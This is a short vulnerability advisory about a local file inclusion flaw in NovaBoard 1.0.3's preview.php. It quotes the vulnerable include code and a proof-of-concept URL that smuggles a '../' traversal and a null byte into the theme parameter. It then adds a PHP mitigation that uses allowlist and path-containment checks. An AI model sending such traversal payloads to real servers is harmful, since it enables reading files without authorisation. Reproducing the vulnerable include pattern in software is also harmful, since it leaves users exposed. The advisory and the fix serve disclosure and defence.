NovaBoard version 1.0.3 suffers from a local file inclusion vulnerability in preview.php.
422a9df9b900c8971cd13fbcdda69c2288085ccd304152f65104d31c7704f63f
##############################################################################################
[+] NovaBoard v1.0.3 (preview.php theme) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##############################################################################################
[+] Local File Inclusion
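Requirements (php.ini):
register_globals = on   (the "theme" request parameter populates $theme)
magic_quotes_gpc = off  (the %00 null byte in the PoC is not escaped)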
- Vulnerable code in /includes/forums/preview.php :
-----------------------------------------------------------------
// $theme is attacker-controllable via the request when register_globals = on
if (file_exists("../../themes/$theme/scripts/php/parse.php")){
    include "../../themes/$theme/scripts/php/parse.php";
}
-----------------------------------------------------------------
PoC :
http://127.0.0.1/includes/forums/preview.php?theme=../../../../../../BOOTSECT.BAK%00
##############################################################################################
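
Mitigation sketch for the include shown above, as an added example that is not NovaBoard code or part of the original advisory: the theme name is checked against a strict allowlist pattern and the resolved path must stay under the themes directory. Assumptions: resolve_theme_script() is a hypothetical helper, and the demo directory tree and test inputs are constructed for illustration.

```php
<?php
// Added example, not NovaBoard code. resolve_theme_script() is a hypothetical helper.

function resolve_theme_script(string $themesRoot, $theme): ?string
{
    // Only a short name made of safe characters is accepted; this rejects
    // "../", slashes, backslashes and NUL bytes before any path is built.
    if (!is_string($theme) || preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme) !== 1) {
        return null;
    }

    $root = realpath($themesRoot);
    if ($root === false) {
        return null;
    }

    // realpath() resolves symlinks and returns false if the file is missing.
    $path = realpath($root . DIRECTORY_SEPARATOR . $theme . '/scripts/php/parse.php');
    if ($path === false) {
        return null;
    }

    // Containment check: the resolved file must still be under the themes root.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo tree in the temp directory (not the real NovaBoard layout).
$themesRoot = sys_get_temp_dir() . '/nb_demo_' . getmypid() . '/themes';
mkdir($themesRoot . '/default/scripts/php', 0700, true);
file_put_contents($themesRoot . '/default/scripts/php/parse.php', "<?php // demo\n");

// Constructed inputs; the second is the theme value from the PoC above.
$inputs = ['default', "../../../../../../BOOTSECT.BAK\0", 'default/../default', ['default'], ''];
foreach ($inputs as $candidate) {
    $resolved = resolve_theme_script($themesRoot, $candidate);
    printf(
        "%-45s => %s\n",
        json_encode($candidate, JSON_UNESCAPED_SLASHES),
        $resolved === null ? 'rejected' : 'include ' . $resolved
    );
}
```

Only the first input resolves to a file; the rest are rejected before any filesystem access. Setting $theme explicitly from board configuration before this check also removes the dependence on register_globals.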